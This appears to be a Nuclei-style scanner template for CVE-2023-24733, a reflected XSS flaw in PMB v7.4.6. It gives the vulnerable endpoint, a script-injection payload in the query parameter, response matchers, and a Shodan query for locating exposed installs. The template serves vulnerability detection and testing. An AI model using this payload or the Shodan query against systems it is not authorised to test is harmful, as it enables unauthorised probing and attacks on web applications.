36 lines
926 B
YAML
36 lines
926 B
YAML
|
id: CVE-2023-24733
|
||
|
|
||
|
info:
|
||
|
name: PMB v7.4.6 - Reflected XSS
|
||
|
author: r3Y3r53
|
||
|
severity: medium
|
||
|
description: |
|
||
|
PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950_new.php.
|
||
|
reference:
|
||
|
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
shodan-query: http.favicon.hash:1469328760
|
||
|
tags: cve,cve2023,unauth,xss,pmb
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '3@1=<script>alert(document.domain)</script>@'
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|